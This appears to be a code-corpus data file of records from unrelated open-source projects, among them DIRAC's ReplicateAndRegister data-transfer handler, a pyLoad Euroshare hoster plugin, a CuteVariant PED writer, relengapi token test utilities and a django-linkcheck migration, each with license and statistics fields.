| false
| false
| false
|
arrabito/DIRAC
|
DataManagementSystem/Agent/RequestOperations/ReplicateAndRegister.py
|
1
|
28823
|
########################################################################
# File: ReplicateAndRegister.py
# Author: Krzysztof.Ciba@NOSPAMgmail.com
# Date: 2013/03/13 18:49:12
########################################################################
""" :mod: ReplicateAndRegister
==========================
.. module: ReplicateAndRegister
:synopsis: ReplicateAndRegister operation handler
.. moduleauthor:: Krzysztof.Ciba@NOSPAMgmail.com
ReplicateAndRegister operation handler
"""
__RCSID__ = "$Id$"
# #
# @file ReplicateAndRegister.py
# @author Krzysztof.Ciba@NOSPAMgmail.com
# @date 2013/03/13 18:49:28
# @brief Definition of ReplicateAndRegister class.
# # imports
import re
from collections import defaultdict
# # from DIRAC
from DIRAC import S_OK, S_ERROR, gLogger
from DIRAC.Core.Utilities.Adler import compareAdler, hexAdlerToInt, intAdlerToHex
from DIRAC.FrameworkSystem.Client.MonitoringClient import gMonitor
from DIRAC.DataManagementSystem.Client.DataManager import DataManager
from DIRAC.DataManagementSystem.Agent.RequestOperations.DMSRequestOperationsBase import DMSRequestOperationsBase
from DIRAC.Resources.Storage.StorageElement import StorageElement
from DIRAC.Resources.Catalog.FileCatalog import FileCatalog
from DIRAC.DataManagementSystem.Client.FTS3Operation import FTS3TransferOperation
from DIRAC.DataManagementSystem.Client.FTS3File import FTS3File
from DIRAC.DataManagementSystem.Client.FTS3Client import FTS3Client
from DIRAC.ConfigurationSystem.Client.Helpers import Registry
from DIRAC.DataManagementSystem.Client.FTSClient import FTSClient
def filterReplicas(opFile, logger=None, dataManager=None):
""" filter out banned/invalid source SEs """
if logger is None:
logger = gLogger
if dataManager is None:
dataManager = DataManager()
log = logger.getSubLogger("filterReplicas")
result = defaultdict(list)
replicas = dataManager.getActiveReplicas(opFile.LFN, getUrl=False)
if not replicas["OK"]:
log.error('Failed to get active replicas', replicas["Message"])
return replicas
reNotExists = re.compile(r".*such file.*")
replicas = replicas["Value"]
failed = replicas["Failed"].get(opFile.LFN, "")
if reNotExists.match(failed.lower()):
opFile.Status = "Failed"
opFile.Error = failed
return S_ERROR(failed)
replicas = replicas["Successful"].get(opFile.LFN, {})
noReplicas = False
if not replicas:
allReplicas = dataManager.getReplicas(opFile.LFN, getUrl=False)
if allReplicas['OK']:
allReplicas = allReplicas['Value']['Successful'].get(opFile.LFN, {})
if not allReplicas:
result['NoReplicas'].append(None)
noReplicas = True
else:
# There are replicas but we cannot get metadata because the replica is not active
result['NoActiveReplicas'] += list(allReplicas)
log.verbose("File has no%s replica in File Catalog" % ('' if noReplicas else ' active'), opFile.LFN)
else:
return allReplicas
if not opFile.Checksum or hexAdlerToInt(opFile.Checksum) is False:
# Set Checksum to FC checksum if not set in the request
fcMetadata = FileCatalog().getFileMetadata(opFile.LFN)
fcChecksum = fcMetadata.get(
'Value',
{}).get(
'Successful',
{}).get(
opFile.LFN,
{}).get('Checksum')
# Replace opFile.Checksum if it doesn't match a valid FC checksum
if fcChecksum:
if hexAdlerToInt(fcChecksum) is not False:
opFile.Checksum = fcChecksum
opFile.ChecksumType = fcMetadata['Value']['Successful'][opFile.LFN].get('ChecksumType', 'Adler32')
else:
opFile.Checksum = None
# If no replica was found, return what we collected as information
if not replicas:
return S_OK(result)
for repSEName in replicas:
repSEMetadata = StorageElement(repSEName).getFileMetadata(opFile.LFN)
error = repSEMetadata.get('Message', repSEMetadata.get('Value', {}).get('Failed', {}).get(opFile.LFN))
if error:
log.warn('unable to get metadata at %s for %s' % (repSEName, opFile.LFN), error.replace('\n', ''))
if 'File does not exist' in error:
result['NoReplicas'].append(repSEName)
else:
result["NoMetadata"].append(repSEName)
elif not noReplicas:
repSEMetadata = repSEMetadata['Value']['Successful'][opFile.LFN]
seChecksum = hexAdlerToInt(repSEMetadata.get("Checksum"))
# As from here seChecksum is an integer or False, not a hex string!
if seChecksum is False and opFile.Checksum:
result['NoMetadata'].append(repSEName)
elif not seChecksum and opFile.Checksum:
opFile.Checksum = None
opFile.ChecksumType = None
elif seChecksum and (not opFile.Checksum or opFile.Checksum == 'False'):
# Use the SE checksum (convert to hex) and force type to be Adler32
opFile.Checksum = intAdlerToHex(seChecksum)
opFile.ChecksumType = 'Adler32'
if not opFile.Checksum or not seChecksum or compareAdler(
intAdlerToHex(seChecksum), opFile.Checksum):
# # All checksums are OK
result["Valid"].append(repSEName)
else:
log.warn(" %s checksum mismatch, FC: '%s' @%s: '%s'" %
(opFile.LFN, opFile.Checksum, repSEName, intAdlerToHex(seChecksum)))
result["Bad"].append(repSEName)
else:
# If a replica was found somewhere, don't set the file as no replicas
result['NoReplicas'] = []
return S_OK(result)
########################################################################
class ReplicateAndRegister(DMSRequestOperationsBase):
"""
.. class:: ReplicateAndRegister
ReplicateAndRegister operation handler
"""
def __init__(self, operation=None, csPath=None):
"""c'tor
:param self: self reference
:param Operation operation: Operation instance
:param str csPath: CS path for this handler
"""
super(ReplicateAndRegister, self).__init__(operation, csPath)
# # own gMonitor stuff for files
gMonitor.registerActivity("ReplicateAndRegisterAtt", "Replicate and register attempted",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
gMonitor.registerActivity("ReplicateOK", "Replications successful",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
gMonitor.registerActivity("ReplicateFail", "Replications failed",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
gMonitor.registerActivity("RegisterOK", "Registrations successful",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
gMonitor.registerActivity("RegisterFail", "Registrations failed",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
# # for FTS
gMonitor.registerActivity("FTSScheduleAtt", "Files schedule attempted",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
gMonitor.registerActivity("FTSScheduleOK", "File schedule successful",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
gMonitor.registerActivity("FTSScheduleFail", "File schedule failed",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
# # SE cache
# Clients
self.fc = FileCatalog()
def __call__(self):
""" call me maybe """
# # check replicas first
checkReplicas = self.__checkReplicas()
if not checkReplicas["OK"]:
self.log.error('Failed to check replicas', checkReplicas["Message"])
if hasattr(self, "FTSMode") and getattr(self, "FTSMode"):
bannedGroups = getattr(self, "FTSBannedGroups") if hasattr(self, "FTSBannedGroups") else ()
if self.request.OwnerGroup in bannedGroups:
self.log.verbose("usage of FTS system is banned for request's owner")
return self.dmTransfer()
if getattr(self, 'UseNewFTS3', False):
return self.fts3Transfer()
else:
return self.ftsTransfer()
return self.dmTransfer()
def __checkReplicas(self):
""" check done replicas and update file states """
waitingFiles = dict([(opFile.LFN, opFile) for opFile in self.operation
if opFile.Status in ("Waiting", "Scheduled")])
targetSESet = set(self.operation.targetSEList)
replicas = self.fc.getReplicas(waitingFiles.keys())
if not replicas["OK"]:
self.log.error('Failed to get replicas', replicas["Message"])
return replicas
reMissing = re.compile(r".*such file.*")
for failedLFN, errStr in replicas["Value"]["Failed"].iteritems():
waitingFiles[failedLFN].Error = errStr
if reMissing.search(errStr.lower()):
self.log.error("File does not exists", failedLFN)
gMonitor.addMark("ReplicateFail", len(targetSESet))
waitingFiles[failedLFN].Status = "Failed"
for successfulLFN, reps in replicas["Value"]["Successful"].iteritems():
if targetSESet.issubset(set(reps)):
self.log.info("file %s has been replicated to all targets" % successfulLFN)
waitingFiles[successfulLFN].Status = "Done"
return S_OK()
def _addMetadataToFiles(self, toSchedule):
""" Add metadata to those files that need to be scheduled through FTS
toSchedule is a dictionary:
{'lfn1': opFile, 'lfn2': opFile}
"""
if toSchedule:
self.log.info("found %s files to schedule, getting metadata from FC" % len(toSchedule))
else:
self.log.verbose("No files to schedule")
return S_OK([])
res = self.fc.getFileMetadata(toSchedule.keys())
if not res['OK']:
return res
else:
if res['Value']['Failed']:
self.log.warn("Can't schedule %d files: problems getting the metadata: %s" %
(len(res['Value']['Failed']), ', '.join(res['Value']['Failed'])))
metadata = res['Value']['Successful']
filesToSchedule = {}
for lfn, lfnMetadata in metadata.iteritems():
opFileToSchedule = toSchedule[lfn][0]
opFileToSchedule.GUID = lfnMetadata['GUID']
# In principle this is defined already in filterReplicas()
if not opFileToSchedule.Checksum:
opFileToSchedule.Checksum = metadata[lfn]['Checksum']
opFileToSchedule.ChecksumType = metadata[lfn]['ChecksumType']
opFileToSchedule.Size = metadata[lfn]['Size']
filesToSchedule[opFileToSchedule.LFN] = opFileToSchedule
return S_OK(filesToSchedule)
def _filterReplicas(self, opFile):
""" filter out banned/invalid source SEs """
return filterReplicas(opFile, logger=self.log, dataManager=self.dm)
def ftsTransfer(self):
""" replicate and register using FTS """
self.log.info("scheduling files in FTS...")
bannedTargets = self.checkSEsRSS()
if not bannedTargets['OK']:
gMonitor.addMark("FTSScheduleAtt")
gMonitor.addMark("FTSScheduleFail")
return bannedTargets
if bannedTargets['Value']:
return S_OK("%s targets are banned for writing" % ",".join(bannedTargets['Value']))
# Can continue now
self.log.verbose("No targets banned for writing")
toSchedule = {}
delayExecution = 0
errors = defaultdict(int)
for opFile in self.getWaitingFilesList():
opFile.Error = ''
gMonitor.addMark("FTSScheduleAtt")
# # check replicas
replicas = self._filterReplicas(opFile)
if not replicas["OK"]:
continue
replicas = replicas["Value"]
validReplicas = replicas.get("Valid")
noMetaReplicas = replicas.get("NoMetadata")
noReplicas = replicas.get('NoReplicas')
badReplicas = replicas.get('Bad')
noActiveReplicas = replicas.get('NoActiveReplicas')
if validReplicas:
validTargets = list(set(self.operation.targetSEList) - set(validReplicas))
if not validTargets:
self.log.info("file %s is already present at all targets" % opFile.LFN)
opFile.Status = "Done"
else:
toSchedule[opFile.LFN] = [opFile, validReplicas, validTargets]
else:
gMonitor.addMark("FTSScheduleFail")
if noMetaReplicas:
err = "Couldn't get metadata"
errors[err] += 1
self.log.verbose(
"unable to schedule '%s', %s at %s" %
(opFile.LFN, err, ','.join(noMetaReplicas)))
opFile.Error = err
elif noReplicas:
err = "File doesn't exist"
errors[err] += 1
self.log.error("Unable to schedule transfer",
"%s %s at %s" % (opFile.LFN, err, ','.join(noReplicas)))
opFile.Error = err
opFile.Status = 'Failed'
elif badReplicas:
err = "All replicas have a bad checksum"
errors[err] += 1
self.log.error("Unable to schedule transfer",
"%s, %s at %s" % (opFile.LFN, err, ','.join(badReplicas)))
opFile.Error = err
opFile.Status = 'Failed'
elif noActiveReplicas:
err = "No active replica found"
errors[err] += 1
self.log.verbose("Unable to schedule transfer",
"%s, %s at %s" % (opFile.LFN, err, ','.join(noActiveReplicas)))
opFile.Error = err
# All source SEs are banned, delay execution by 1 hour
delayExecution = 60
if delayExecution:
self.log.info("Delay execution of the request by %d minutes" % delayExecution)
self.request.delayNextExecution(delayExecution)
# Log error counts
for error, count in errors.iteritems():
self.log.error(error, 'for %d files' % count)
filesToScheduleList = []
res = self._addMetadataToFiles(toSchedule)
if not res['OK']:
return res
else:
filesToSchedule = res['Value']
for lfn in filesToSchedule:
filesToScheduleList.append((filesToSchedule[lfn][0].toJSON()['Value'],
toSchedule[lfn][1],
toSchedule[lfn][2]))
if filesToScheduleList:
ftsSchedule = FTSClient().ftsSchedule(self.request.RequestID,
self.operation.OperationID,
filesToScheduleList)
if not ftsSchedule["OK"]:
self.log.error("Completely failed to schedule to FTS:", ftsSchedule["Message"])
return ftsSchedule
# might have nothing to schedule
ftsSchedule = ftsSchedule["Value"]
if not ftsSchedule:
return S_OK()
self.log.info("%d files have been scheduled to FTS" % len(ftsSchedule['Successful']))
for opFile in self.operation:
fileID = opFile.FileID
if fileID in ftsSchedule["Successful"]:
gMonitor.addMark("FTSScheduleOK", 1)
opFile.Status = "Scheduled"
self.log.debug("%s has been scheduled for FTS" % opFile.LFN)
elif fileID in ftsSchedule["Failed"]:
gMonitor.addMark("FTSScheduleFail", 1)
opFile.Error = ftsSchedule["Failed"][fileID]
if 'sourceSURL equals to targetSURL' in opFile.Error:
# In this case there is no need to continue
opFile.Status = 'Failed'
self.log.warn("unable to schedule %s for FTS: %s" % (opFile.LFN, opFile.Error))
else:
self.log.info("No files to schedule after metadata checks")
# Just in case some transfers could not be scheduled, try them with RM
return self.dmTransfer(fromFTS=True)
def _checkExistingFTS3Operations(self):
"""
Check if there are ongoing FTS3Operation for the current RMS Operation
Under some conditions, we can be trying to schedule files while
there is still an FTS transfer going on. This typically happens
when the REA hangs. To prevent further race condition, we check
if there are FTS3Operations in a non Final state matching the
current operation ID. If so, we put the corresponding files in
scheduled mode. We will then wait till the FTS3 Operation performs
the callback
:returns: S_OK with True if we can go on, False if we should stop the processing
"""
res = FTS3Client().getOperationsFromRMSOpID(self.operation.OperationID)
if not res['OK']:
self.log.debug(
"Could not get FTS3Operations matching OperationID",
self.operation.OperationID)
return res
existingFTSOperations = res['Value']
# It is ok to have FTS Operations in a final state, so we
# care only about the others
unfinishedFTSOperations = [
ops for ops in existingFTSOperations if ops.status not in FTS3TransferOperation.FINAL_STATES]
if not unfinishedFTSOperations:
self.log.debug("No ongoing FTS3Operations, all good")
return S_OK(True)
self.log.warn("Some FTS3Operations already exist for the RMS Operation:",
[op.operationID for op in unfinishedFTSOperations])
# This would really be a screwed up situation !
if len(unfinishedFTSOperations) > 1:
self.log.warn("That's a serious problem !!")
# We take the rmsFileID of the files in the Operations,
# find the corresponding File object, and set them scheduled
rmsFileIDsToSetScheduled = set(
[ftsFile.rmsFileID for ftsOp in unfinishedFTSOperations for ftsFile in ftsOp.ftsFiles])
for opFile in self.operation:
# If it is in the DB, it has a FileID
opFileID = opFile.FileID
if opFileID in rmsFileIDsToSetScheduled:
self.log.warn("Setting RMSFile as already scheduled", opFileID)
opFile.Status = "Scheduled"
# We return here such that the Request is set back to Scheduled in the DB
# With no further modification
return S_OK(False)
def fts3Transfer(self):
""" replicate and register using FTS3 """
self.log.info("scheduling files in FTS3...")
# Check first if we do not have ongoing transfers
res = self._checkExistingFTS3Operations()
if not res['OK']:
return res
# if res['Value'] is False
# it means that there are ongoing transfers
# and we should stop here
if res['Value'] is False:
# return S_OK such that the request is put back
return S_OK()
fts3Files = []
toSchedule = {}
# Dict which maps the FileID to the object
rmsFilesIds = {}
for opFile in self.getWaitingFilesList():
rmsFilesIds[opFile.FileID] = opFile
opFile.Error = ''
gMonitor.addMark("FTSScheduleAtt")
# # check replicas
replicas = self._filterReplicas(opFile)
if not replicas["OK"]:
continue
replicas = replicas["Value"]
validReplicas = replicas["Valid"]
noMetaReplicas = replicas["NoMetadata"]
noReplicas = replicas['NoReplicas']
badReplicas = replicas['Bad']
noPFN = replicas['NoPFN']
if validReplicas:
validTargets = list(set(self.operation.targetSEList) - set(validReplicas))
if not validTargets:
self.log.info("file %s is already present at all targets" % opFile.LFN)
opFile.Status = "Done"
else:
toSchedule[opFile.LFN] = [opFile, validTargets]
else:
gMonitor.addMark("FTSScheduleFail")
if noMetaReplicas:
self.log.warn("unable to schedule '%s', couldn't get metadata at %s" % (opFile.LFN, ','.join(noMetaReplicas)))
opFile.Error = "Couldn't get metadata"
elif noReplicas:
self.log.error(
"Unable to schedule transfer", "File %s doesn't exist at %s" %
(opFile.LFN, ','.join(noReplicas)))
opFile.Error = 'No replicas found'
opFile.Status = 'Failed'
elif badReplicas:
self.log.error(
"Unable to schedule transfer",
"File %s, all replicas have a bad checksum at %s" %
(opFile.LFN,
','.join(badReplicas)))
opFile.Error = 'All replicas have a bad checksum'
opFile.Status = 'Failed'
elif noPFN:
self.log.warn(
"unable to schedule %s, could not get a PFN at %s" %
(opFile.LFN, ','.join(noPFN)))
res = self._addMetadataToFiles(toSchedule)
if not res['OK']:
return res
else:
filesToSchedule = res['Value']
for lfn in filesToSchedule:
opFile = filesToSchedule[lfn]
validTargets = toSchedule[lfn][1]
for targetSE in validTargets:
ftsFile = FTS3File.fromRMSFile(opFile, targetSE)
fts3Files.append(ftsFile)
if fts3Files:
res = Registry.getUsernameForDN(self.request.OwnerDN)
if not res['OK']:
self.log.error(
"Cannot get username for DN", "%s %s" %
(self.request.OwnerDN, res['Message']))
return res
username = res['Value']
fts3Operation = FTS3TransferOperation.fromRMSObjects(self.request, self.operation, username)
fts3Operation.ftsFiles = fts3Files
ftsSchedule = FTS3Client().persistOperation(fts3Operation)
if not ftsSchedule["OK"]:
self.log.error("Completely failed to schedule to FTS3:", ftsSchedule["Message"])
return ftsSchedule
# might have nothing to schedule
ftsSchedule = ftsSchedule["Value"]
self.log.info("Scheduled with FTS3Operation id %s" % ftsSchedule)
self.log.info("%d files have been scheduled to FTS3" % len(fts3Files))
for ftsFile in fts3Files:
opFile = rmsFilesIds[ftsFile.rmsFileID]
gMonitor.addMark("FTSScheduleOK", 1)
opFile.Status = "Scheduled"
self.log.debug("%s has been scheduled for FTS" % opFile.LFN)
else:
self.log.info("No files to schedule after metadata checks")
# Just in case some transfers could not be scheduled, try them with RM
return self.dmTransfer(fromFTS=True)
def dmTransfer(self, fromFTS=False):
""" replicate and register using dataManager """
# # get waiting files. If none just return
# # source SE
sourceSE = self.operation.SourceSE if self.operation.SourceSE else None
if sourceSE:
# # check source se for read
bannedSource = self.checkSEsRSS(sourceSE, 'ReadAccess')
if not bannedSource["OK"]:
gMonitor.addMark("ReplicateAndRegisterAtt", len(self.operation))
gMonitor.addMark("ReplicateFail", len(self.operation))
return bannedSource
if bannedSource["Value"]:
self.operation.Error = "SourceSE %s is banned for reading" % sourceSE
self.log.info(self.operation.Error)
return S_OK(self.operation.Error)
# # check targetSEs for write
bannedTargets = self.checkSEsRSS()
if not bannedTargets['OK']:
gMonitor.addMark("ReplicateAndRegisterAtt", len(self.operation))
gMonitor.addMark("ReplicateFail", len(self.operation))
return bannedTargets
if bannedTargets['Value']:
self.operation.Error = "%s targets are banned for writing" % ",".join(bannedTargets['Value'])
return S_OK(self.operation.Error)
# Can continue now
self.log.verbose("No targets banned for writing")
waitingFiles = self.getWaitingFilesList()
if not waitingFiles:
return S_OK()
# # loop over files
if fromFTS:
self.log.info("Trying transfer using replica manager as FTS failed")
else:
self.log.info("Transferring files using Data manager...")
errors = defaultdict(int)
delayExecution = 0
for opFile in waitingFiles:
if opFile.Error in ("Couldn't get metadata",
"File doesn't exist",
'No active replica found',
"All replicas have a bad checksum",):
err = "File already in error status"
errors[err] += 1
gMonitor.addMark("ReplicateAndRegisterAtt", 1)
opFile.Error = ''
lfn = opFile.LFN
# Check if replica is at the specified source
replicas = self._filterReplicas(opFile)
if not replicas["OK"]:
self.log.error('Failed to check replicas', replicas["Message"])
continue
replicas = replicas["Value"]
validReplicas = replicas.get("Valid")
noMetaReplicas = replicas.get("NoMetadata")
noReplicas = replicas.get('NoReplicas')
badReplicas = replicas.get('Bad')
noActiveReplicas = replicas.get('NoActiveReplicas')
if not validReplicas:
gMonitor.addMark("ReplicateFail")
if noMetaReplicas:
err = "Couldn't get metadata"
errors[err] += 1
self.log.verbose(
"unable to replicate '%s', couldn't get metadata at %s" %
(opFile.LFN, ','.join(noMetaReplicas)))
opFile.Error = err
elif noReplicas:
err = "File doesn't exist"
errors[err] += 1
self.log.verbose(
"Unable to replicate", "File %s doesn't exist at %s" %
(opFile.LFN, ','.join(noReplicas)))
opFile.Error = err
opFile.Status = 'Failed'
elif badReplicas:
err = "All replicas have a bad checksum"
errors[err] += 1
self.log.error(
"Unable to replicate", "%s, all replicas have a bad checksum at %s" %
(opFile.LFN, ','.join(badReplicas)))
opFile.Error = err
opFile.Status = 'Failed'
elif noActiveReplicas:
err = "No active replica found"
errors[err] += 1
self.log.verbose("Unable to schedule transfer",
"%s, %s at %s" % (opFile.LFN, err, ','.join(noActiveReplicas)))
opFile.Error = err
# All source SEs are banned, delay execution by 1 hour
delayExecution = 60
continue
# # get the first one in the list
if sourceSE not in validReplicas:
if sourceSE:
err = "File not at specified source"
errors[err] += 1
self.log.warn(
"%s is not at specified sourceSE %s, changed to %s" %
(lfn, sourceSE, validReplicas[0]))
sourceSE = validReplicas[0]
# # loop over targetSE
catalogs = self.operation.Catalog
if catalogs:
catalogs = [cat.strip() for cat in catalogs.split(',')]
for targetSE in self.operation.targetSEList:
# # call DataManager
if targetSE in validReplicas:
self.log.warn("Request to replicate %s to an existing location: %s" % (lfn, targetSE))
opFile.Status = 'Done'
continue
res = self.dm.replicateAndRegister(lfn, targetSE, sourceSE=sourceSE, catalog=catalogs)
if res["OK"]:
if lfn in res["Value"]["Successful"]:
if "replicate" in res["Value"]["Successful"][lfn]:
repTime = res["Value"]["Successful"][lfn]["replicate"]
prString = "file %s replicated at %s in %s s." % (lfn, targetSE, repTime)
gMonitor.addMark("ReplicateOK", 1)
if "register" in res["Value"]["Successful"][lfn]:
gMonitor.addMark("RegisterOK", 1)
regTime = res["Value"]["Successful"][lfn]["register"]
prString += ' and registered in %s s.' % regTime
self.log.info(prString)
else:
gMonitor.addMark("RegisterFail", 1)
prString += " but failed to register"
self.log.warn(prString)
opFile.Error = "Failed to register"
# # add register replica operation
registerOperation = self.getRegisterOperation(
opFile, targetSE, type='RegisterReplica')
self.request.insertAfter(registerOperation, self.operation)
else:
self.log.error("Failed to replicate", "%s to %s" % (lfn, targetSE))
gMonitor.addMark("ReplicateFail", 1)
opFile.Error = "Failed to replicate"
else:
gMonitor.addMark("ReplicateFail", 1)
reason = res["Value"]["Failed"][lfn]
self.log.error(
"Failed to replicate and register", "File %s at %s:" %
(lfn, targetSE), reason)
opFile.Error = reason
else:
gMonitor.addMark("ReplicateFail", 1)
opFile.Error = "DataManager error: %s" % res["Message"]
self.log.error("DataManager error", res["Message"])
if not opFile.Error:
if len(self.operation.targetSEList) > 1:
self.log.info("file %s has been replicated to all targetSEs" % lfn)
opFile.Status = "Done"
# Log error counts
if delayExecution:
self.log.info("Delay execution of the request by %d minutes" % delayExecution)
self.request.delayNextExecution(delayExecution)
for error, count in errors.iteritems():
self.log.error(error, 'for %d files' % count)
return S_OK()
|
gpl-3.0
| 803,170,856,147,399,300
| 37.025066
| 120
| 0.628526
| false
| 3.908203
| false
| false
| false
|
fener06/pyload
|
module/plugins/hoster/EuroshareEu.py
|
1
|
2302
|
# -*- coding: utf-8 -*-
"""
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License,
or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, see <http://www.gnu.org/licenses/>.
@author: zoidberg
"""
import re
from module.plugins.internal.SimpleHoster import SimpleHoster, create_getInfo
class EuroshareEu(SimpleHoster):
__name__ = "EuroshareEu"
__type__ = "hoster"
__pattern__ = r"http://(\w*\.)?euroshare.(eu|sk|cz|hu|pl)/file/.*"
__version__ = "0.23"
__description__ = """Euroshare.eu"""
__author_name__ = ("zoidberg")
FILE_INFO_PATTERN = r'<span style="float: left;"><strong>(?P<N>.+?)</strong> \((?P<S>.+?)\)</span>'
FILE_OFFLINE_PATTERN = ur'<h2>S.bor sa nena.iel</h2>|Požadovaná stránka neexistuje!'
FREE_URL_PATTERN = r'<a href="(/file/\d+/[^/]*/download/)"><div class="downloadButton"'
ERR_PARDL_PATTERN = r'<h2>Prebieha s.ahovanie</h2>|<p>Naraz je z jednej IP adresy mo.n. s.ahova. iba jeden s.bor'
FILE_URL_REPLACEMENTS = [(r"(http://[^/]*\.)(sk|cz|hu|pl)/", r"\1eu/")]
def handlePremium(self):
self.download(self.pyfile.url.rstrip('/') + "/download/")
def handleFree(self):
if re.search(self.ERR_PARDL_PATTERN, self.html) is not None:
self.longWait(300, 12)
found = re.search(self.FREE_URL_PATTERN, self.html)
if found is None:
self.parseError("Parse error (URL)")
parsed_url = "http://euroshare.eu%s" % found.group(1)
self.logDebug("URL", parsed_url)
self.download(parsed_url, disposition=True)
check = self.checkDownload({"multi_dl": re.compile(self.ERR_PARDL_PATTERN)})
if check == "multi_dl":
self.longWait(300, 12)
getInfo = create_getInfo(EuroshareEu)
|
gpl-3.0
| 7,234,009,282,891,823,000
| 40.071429
| 117
| 0.629839
| false
| 3.33672
| false
| false
| false
|
labsquare/CuteVariant
|
cutevariant/core/writer/pedwriter.py
|
1
|
2889
|
import csv
from .abstractwriter import AbstractWriter
from cutevariant.core.sql import get_samples
class PedWriter(AbstractWriter):
"""Writer allowing to export samples of a project into a PED/PLINK file.
Attributes:
device: a file object typically returned by open("w")
Example:
>>> with open(filename,"rw") as file:
... writer = MyWriter(file)
... writer.save(conn)
"""
def __init__(self, device):
super().__init__(device)
def save(self, conn, delimiter="\t", **kwargs):
r"""Dump samples into a tabular file
Notes:
File is written without header.
Example of line::
`family_id\tindividual_id\tfather_id\tmother_id\tsex\tphenotype`
Args:
conn (sqlite.connection): sqlite connection
delimiter (str, optional): Delimiter char used in exported file;
(default: ``\t``).
**kwargs (dict, optional): Arguments can be given to override
individual formatting parameters in the current dialect.
"""
writer = csv.DictWriter(
self.device,
delimiter=delimiter,
lineterminator="\n",
fieldnames=[
"family_id",
"name",
"father_id",
"mother_id",
"sex",
"phenotype",
],
extrasaction="ignore",
**kwargs
)
g = list(get_samples(conn))
# Map DB ids with individual_ids
individual_ids_mapping = {sample["id"]: sample["name"] for sample in g}
# Add default value
individual_ids_mapping[0] = 0
# Replace DB ids
for sample in g:
sample["father_id"] = individual_ids_mapping[sample["father_id"]]
sample["mother_id"] = individual_ids_mapping[sample["mother_id"]]
writer.writerows(g)
def save_from_list(self, samples, delimiter="\t", **kwargs):
r"""Dump samples into a tabular file
Args:
samples(list): Iterable of samples; each sample is a list itself.
=> It's up to the user to give field in the correct order.
delimiter (str, optional): Delimiter char used in exported file;
(default: ``\t``).
**kwargs (dict, optional): Arguments can be given to override
individual formatting parameters in the current dialect.
Notes:
Replace None or empty strings to 0 (unknown PED ID)
"""
writer = csv.writer(
self.device, delimiter=delimiter, lineterminator="\n", **kwargs
)
# Replace None or empty strings to 0 (unknown PED ID)
clean_samples = ([item if item else 0 for item in sample] for sample in samples)
writer.writerows(clean_samples)
|
gpl-3.0
| -2,977,546,047,046,953,000
| 32.988235
| 88
| 0.563171
| false
| 4.472136
| false
| false
| false
|
Callek/build-relengapi
|
relengapi/blueprints/tokenauth/util.py
|
1
|
2357
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import json
from itsdangerous import BadData
from relengapi.blueprints.tokenauth.tables import Token
from relengapi.lib.permissions import p
# test utilities
class FakeSerializer(object):
"""A token serializer that produces a readable serialization, for use in
tests."""
@staticmethod
def prm(id):
return FakeSerializer.dumps(
{"iss": "ra2", "jti": "t%d" % id, "typ": "prm"})
@staticmethod
def tmp(nbf, exp, prm, mta):
return FakeSerializer.dumps(
{"iss": "ra2", "typ": "tmp", 'nbf': nbf,
"exp": exp, "prm": prm, "mta": mta})
@staticmethod
def usr(id):
return FakeSerializer.dumps(
{"iss": "ra2", "jti": "t%d" % id, "typ": "usr"})
@staticmethod
def dumps(data):
return 'FK:' + json.dumps(data,
separators=(',', ':'),
sort_keys=True)
@staticmethod
def loads(data):
if data[:3] != 'FK:':
raise BadData('Not a fake token')
else:
return json.loads(data[3:])
# sample tokens, both a function to insert, and a JSON representation of the
# corresponding result.
def insert_prm(app):
session = app.db.session('relengapi')
t = Token(
id=1,
typ='prm',
disabled=False,
permissions=[p.test_tokenauth.zig],
description="Zig only")
session.add(t)
session.commit()
prm_json = {
'id': 1,
'typ': 'prm',
'description': 'Zig only',
'permissions': ['test_tokenauth.zig'],
'disabled': False,
}
def insert_usr(app, permissions=[p.test_tokenauth.zig], disabled=False):
session = app.db.session('relengapi')
t = Token(
id=2,
typ='usr',
user='me@me.com',
permissions=permissions,
disabled=disabled,
description="User Zig")
session.add(t)
session.commit()
usr_json = {
'id': 2,
'typ': 'usr',
'user': 'me@me.com',
'description': 'User Zig',
'permissions': ['test_tokenauth.zig'],
'disabled': False,
}
def insert_all(app):
insert_prm(app)
insert_usr(app)
|
mpl-2.0
| -2,998,231,699,835,763,000
| 23.05102
| 76
| 0.570216
| false
| 3.445906
| true
| false
| false
|
Ixxy-Open-Source/django-linkcheck-old
|
linkcheck/migrations/0001_initial.py
|
1
|
1560
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Link',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('object_id', models.PositiveIntegerField()),
('field', models.CharField(max_length=128)),
('text', models.CharField(default='', max_length=256)),
('ignore', models.BooleanField(default=False)),
('content_type', models.ForeignKey(to='contenttypes.ContentType')),
],
),
migrations.CreateModel(
name='Url',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('url', models.CharField(unique=True, max_length=255)),
('last_checked', models.DateTimeField(null=True, blank=True)),
('status', models.NullBooleanField()),
('message', models.CharField(max_length=1024, null=True, blank=True)),
('still_exists', models.BooleanField(default=False)),
],
),
migrations.AddField(
model_name='link',
name='url',
field=models.ForeignKey(related_name='links', to='linkcheck.Url'),
),
]
|
bsd-3-clause
| -7,173,154,571,665,117,000
| 37.04878
| 114
| 0.549359
| false
| 4.60177
| false
| false
| false
|
FrederikDiehl/NNForSKLearn
|
NeuralNetwork.py
|
1
|
14455
|
__author__ = 'Frederik Diehl'
import numpy as np
from sklearn.base import BaseEstimator, RegressorMixin
from sklearn.utils import check_random_state
from sklearn.preprocessing import MinMaxScaler
